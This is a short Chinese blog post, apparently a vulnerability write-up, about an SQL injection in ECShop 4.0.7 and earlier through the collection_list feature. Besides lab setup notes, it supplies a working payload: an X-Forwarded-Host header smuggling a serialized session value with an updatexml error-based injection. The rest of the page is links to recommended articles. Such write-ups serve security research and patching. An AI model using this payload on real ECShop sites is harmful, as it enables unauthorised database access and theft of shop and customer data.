ECShop 4.x collection_listSQL注入

blackK_YC2023-12-01 12:28

漏洞描述

ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序

影响版本:ecshop4.0.7 及以下

漏洞环境及利用

docker环境搭建

访问8080端口,数据库主机为mysql,账号密码为root

注册一个账户然后登录

payload

X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953a

漏洞利用

相关推荐
电力小子sp13 分钟前
PHP安全
安全·php
凌晨五点的星22 分钟前
ssrf攻击fastcgi复现及环境搭建
web安全
云卓科技27 分钟前
无人机之4G模块的主要功能和优势
科技·安全·机器人·无人机·制造
网络研究院5 小时前
人工智能有助于解决 IT/OT 集成安全挑战
网络·人工智能·安全·报告·工业·状况
网络研究院8 小时前
执行网络攻击模拟的 7 个步骤
网络·安全·web安全·攻击·模拟·实践·步骤
dreamer29210 小时前
21、Tomato
linux·安全·web安全·网络安全·系统安全
newxtc12 小时前
【爱给网-注册安全分析报告-无验证方式导致安全隐患】
前端·chrome·windows·安全·媒体
2407-2 shw13 小时前
weblogic CVE-2018-2894 靶场攻略
java·运维·服务器·安全·weblogic
热门推荐
01CCF-CSP认证考试 202406-3 文本分词 100分题解02RAG 实践- Ollama+RagFlow 部署本地知识库032024年高教社杯数学建模国赛C题超详细解题思路分析04实战 | 基于YOLOv9和OpenCV实现车辆跟踪计数(步骤 + 源码)05组基轨迹建模 GBTM的介绍与实现(Stata 或 R)06【2024数模国赛赛题思路公开】国赛B题思路丨附可运行代码丨无偿自提07【数据分享】1961—2022年全国范围的逐日降水栅格数据08苍穹外卖面试总结09【2024高教社杯全国大学生数学建模竞赛】B题 生产过程中的决策问题——解题思路 代码 论文10yolov8实战第五天——yolov8+ffmpg实时视频流检测并进行实时推流——(推流,保姆教学)